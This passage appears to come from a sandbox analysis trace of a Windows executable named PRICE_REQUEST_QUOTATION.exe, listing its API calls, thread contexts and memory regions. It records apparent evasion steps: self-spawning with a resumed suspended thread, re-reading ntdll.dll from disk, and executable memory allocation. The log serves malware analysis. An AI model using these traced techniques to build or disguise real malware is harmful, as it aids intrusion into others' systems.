[70]=0x6e, [71]=0x0, [72]=0x9, [73]=0x1, [74]=0x1, [75]=0x1, [76]=0xc4, [77]=0x2e, [78]=0x6e, [79]=0x0), FloatSave.Cr0NpxState=0xf46857d4, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x327000, Edx=0x0, Ecx=0x0, Eax=0x41d470, Ebp=0x0, Eip=0x772d8fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25, [5]=0x2, [6]=0x0, [7]=0xc0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x48, [13]=0xea, [14]=0x19, [15]=0x0, [16]=0x2b, [17]=0xba, [18]=0x29, [19]=0x77, [20]=0xd0, [21]=0xea, [22]=0x19, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x9, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x98, [37]=0xea, [38]=0x19, [39]=0x0, [40]=0x33, [41]=0xb8, [42]=0x29, [43]=0x77, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x59, [49]=0xb8, [50]=0x29, [51]=0x77, [52]=0xdd, [53]=0xc5, [54]=0x19, [55]=0xe9, [56]=0x10, [57]=0xec, [58]=0x19, [59]=0x0, [60]=0xa0, [61]=0xec, [62]=0x19, [63]=0x0, [64]=0x8, [65]=0xec, [66]=0x19, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x94, [73]=0xea, [74]=0x19, [75]=0x0, [76]=0xd0, [77]=0xea, [78]=0x19, [79]=0x0, [80]=0x10, [81]=0xec, [82]=0x19, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0xd8, [89]=0xea, [90]=0x19, [91]=0x0, [92]=0x58, [93]=0xea, [94]=0x19, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x1c, [101]=0xf7, [102]=0x19, [103]=0x0, [104]=0x30, [105]=0xee, [106]=0x2d, [107]=0x77, [108]=0x6d, [109]=0xe, [110]=0x35, [111]=0x9e, [112]=0xfe, [113]=0xff, [114]=0xff, [115]=0xff, [116]=0x59, [117]=0xb8, [118]=0x29, [119]=0x77, [120]=0x9e, [121]=0x1, [122]=0x2a, [123]=0x77, [124]=0x20, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x4, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x8, [141]=0xec, [142]=0x19, [143]=0x0, [144]=0xcc, [145]=0xea, [146]=0x19, [147]=0x0, [148]=0x1, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0xa0, [153]=0xec, [154]=0x19, [155]=0x0, [156]=0xc0, [157]=0x1, [158]=0x2a, [159]=0x77, [160]=0x39, [161]=0xc5, [162]=0x19, [163]=0xe9, [164]=0x20, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x12, [173]=0x0, [174]=0x0, [175]=0x1, [176]=0xd8, [177]=0xea, [178]=0x19, [179]=0x0, [180]=0x6e, [181]=0x0, [182]=0x74, [183]=0x0, [184]=0x64, [185]=0x0, [186]=0x6c, [187]=0x0, [188]=0x6c, [189]=0x0, [190]=0x2e, [191]=0x0, [192]=0x64, [193]=0x0, [194]=0x6c, [195]=0x0, [196]=0x6c, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0xa3, [205]=0x97, [206]=0x29, [207]=0x77, [208]=0x2, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x40, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0xe4, [277]=0xeb, [278]=0x19, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x16, [285]=0x0, [286]=0x18, [287]=0x0, [288]=0x24, [289]=0xf6, [290]=0x19, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0xe0, [297]=0xeb, [298]=0x19, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0xe8, [313]=0xf1, [314]=0x19, [315]=0x0, [316]=0x10, [317]=0x7, [318]=0x71, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x2, [327]=0x0, [328]=0x80, [329]=0xeb, [330]=0x19, [331]=0x0, [332]=0x80, [333]=0xeb, [334]=0x19, [335]=0x0, [336]=0x80, [337]=0xeb, [338]=0x19, [339]=0x0, [340]=0x2, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x2, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x19, [351]=0x0, [352]=0xc9, [353]=0xc4, [354]=0x19, [355]=0xe9, [356]=0x4, [357]=0xed, [358]=0x19, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0xb5, [365]=0x93, [366]=0x29, [367]=0x77, [368]=0x2c, [369]=0xec, [370]=0x19, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x2c, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0xa0, [381]=0xf1, [382]=0x19, [383]=0x0, [384]=0x24, [385]=0xf6, [386]=0x19, [387]=0x0, [388]=0x30, [389]=0x94, [390]=0x29, [391]=0x77, [392]=0xa8, [393]=0xef, [394]=0x19, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x1, [400]=0x16, [401]=0x0, [402]=0x18, [403]=0x0, [404]=0x24, [405]=0xf6, [406]=0x19, [407]=0x0, [408]=0xd4, [409]=0xeb, [410]=0x19, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x29, [415]=0x77, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x64, [425]=0xf1, [426]=0x19, [427]=0x0, [428]=0x9c, [429]=0xb7, [430]=0x29, [431]=0x77, [432]=0x10, [433]=0xec, [434]=0x19, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x81, [441]=0xc5, [442]=0x19, [443]=0xe9, [444]=0x1, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x68, [449]=0xec, [450]=0x19, [451]=0x0, [452]=0x1, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0xcd, [465]=0x35, [466]=0x2a, [467]=0x77, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x9, [477]=0x36, [478]=0x2a, [479]=0x77, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x88, [485]=0x2e, [486]=0x6e, [487]=0x0, [488]=0x94, [489]=0xec, [490]=0x19, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x64, [505]=0xf1, [506]=0x19, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0105.038] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19e508 | out: Wow64Process=0x19e508*=1) returned 1 [0105.038] lstrlenW (lpString="PRICE_REQUEST_QUOTATION.exe") returned 27 [0105.038] lstrlenW (lpString="ntdll.dll") returned 9 [0105.039] lstrlenW (lpString="ntdll.dll") returned 9 [0105.039] lstrlenW (lpString="ntdll.dll") returned 9 [0105.039] lstrlenW (lpString="ntdll.dll") returned 9 [0105.039] lstrlenW (lpString="tdll.dll") returned 8 [0105.039] lstrlenW (lpString="dll.dll") returned 7 [0105.039] lstrlenW (lpString="ll.dll") returned 6 [0105.039] lstrlenW (lpString="l.dll") returned 5 [0105.039] lstrlenW (lpString=".dll") returned 4 [0105.039] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0105.039] GetFileSize (in: hFile=0x23c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0105.039] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0xe660000 [0105.041] ReadFile (in: hFile=0x23c, lpBuffer=0xe660000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19e4dc, lpOverlapped=0x0 | out: lpBuffer=0xe660000*, lpNumberOfBytesRead=0x19e4dc*=0x1784a0, lpOverlapped=0x0) returned 1 [0105.066] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0xe7e0000 [0105.099] CloseHandle (hObject=0x23c) returned 1 [0105.099] VirtualFree (lpAddress=0xe660000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0105.105] VirtualFree (lpAddress=0xe7e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0105.113] NtResumeThread (in: ThreadHandle=0x230, SuspendCount=0x19e524 | out: SuspendCount=0x19e524*=0x1) returned 0x0 [0105.191] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0x1370 Thread: id = 3 os_tid = 0x230 Thread: id = 4 os_tid = 0x1394 Thread: id = 5 os_tid = 0x1384 Process: id = "2" image_name = "price_request_quotation.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\price_request_quotation.exe" page_root = "0x18c2e000" os_pid = "0x68c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x1280" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe\" " cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 366 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 367 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 368 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 369 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 370 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 371 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 372 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 373 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 374 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 375 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "price_request_quotation.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\price_request_quotation.exe") Region: id = 376 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 377 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 378 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 379 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 380 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 381 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 384 start_va = 0x400000 end_va = 0x428fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 393 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 394 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 395 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 396 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 397 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 398 start_va = 0x430000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 399 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 400 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 401 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 402 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 403 start_va = 0x5e0000 end_va = 0x69dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 404 start_va = 0x6a0000 end_va = 0x822fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 405 start_va = 0x830000 end_va = 0x9bbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 406 start_va = 0x9c0000 end_va = 0xcb9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 407 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 408 start_va = 0x6a0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 409 start_va = 0x20000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 410 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 411 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 412 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 413 start_va = 0x430000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 414 start_va = 0x470000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 415 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 416 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 417 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 418 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 419 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 420 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 421 start_va = 0xcc0000 end_va = 0xe3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 422 start_va = 0x1d0000 end_va = 0x1f8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 423 start_va = 0x30000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 424 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 425 start_va = 0x8a0000 end_va = 0x98cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 852 start_va = 0x590000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 853 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 854 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 855 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 856 start_va = 0x990000 end_va = 0x9b9fff monitored = 0 entry_point = 0x995680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 857 start_va = 0xe40000 end_va = 0xfc7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e40000" filename = "" Region: id = 858 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 859 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 860 start_va = 0x990000 end_va = 0x990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 861 start_va = 0xfd0000 end_va = 0x1150fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fd0000" filename = "" Region: id = 862 start_va = 0x1160000 end_va = 0x255ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 885 start_va = 0xcc0000 end_va = 0xce8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cc0000" filename = "" Region: id = 886 start_va = 0xe30000 end_va = 0xe3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 888 start_va = 0x570000 end_va = 0x586fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Thread: id = 6 os_tid = 0x7ac [0105.252] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x19f23c | out: HeapArray=0x19f23c*=0x470000) returned 0x1 [0105.263] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x19f1ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0105.265] NtCreateFile (in: FileHandle=0x19f20c, DesiredAccess=0x120089, ObjectAttributes=0x19f1d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19f1f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19f20c*=0x6c, IoStatusBlock=0x19f1f4*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0105.280] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x472760) returned 1 [0105.285] NtQueryInformationFile (in: FileHandle=0x6c, IoStatusBlock=0x19f1f4, FileInformation=0x19f14c, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19f1f4, FileInformation=0x19f14c) returned 0x0 [0105.291] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1788a0) returned 0x6a9020 [0105.326] NtReadFile (in: FileHandle=0x6c, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x19f1f4, Buffer=0x6a9020, BufferLength=0x1784a0, ByteOffset=0x19f164*=0, Key=0x0 | out: IoStatusBlock=0x19f1f4, Buffer=0x6a9020*) returned 0x0 [0105.328] NtClose (Handle=0x6c) returned 0x0 [0105.329] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x17b001) returned 0x83f020 [0105.346] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x6a9020) returned 1 [0105.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f1e0*=0x0, ZeroBits=0x0, RegionSize=0x19f1e4*=0x2f9522, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x19f1e0*=0x9c0000, RegionSize=0x19f1e4*=0x2fa000) returned 0x0 [0105.447] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1000) returned 0x473350 [0105.447] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1000) returned 0x474358 [0105.447] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1000) returned 0x475360 [0105.447] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2000) returned 0x476368 [0105.447] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x475360) returned 1 [0105.447] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x3000) returned 0x478370 [0105.448] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x476368) returned 1 [0105.448] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4000) returned 0x47b378 [0105.448] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x478370) returned 1 [0105.448] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x5000) returned 0x475360 [0105.448] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47b378) returned 1 [0105.448] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1000) returned 0x47a368 [0105.448] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2000) returned 0x47b370 [0105.448] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47a368) returned 1 [0105.448] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x3000) returned 0x47d378 [0105.448] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47b370) returned 1 [0105.449] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4000) returned 0x480380 [0105.449] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47d378) returned 1 [0105.449] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x5000) returned 0x47a368 [0105.449] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x480380) returned 1 [0105.449] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1000) returned 0x47f370 [0105.449] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2000) returned 0x480378 [0105.449] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47f370) returned 1 [0105.449] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x3000) returned 0x482380 [0105.450] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x480378) returned 1 [0105.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4000) returned 0x485388 [0105.450] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x482380) returned 1 [0105.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x5000) returned 0x47f370 [0105.450] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x485388) returned 1 [0105.450] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x473350) returned 1 [0105.450] RtlFreeHeap 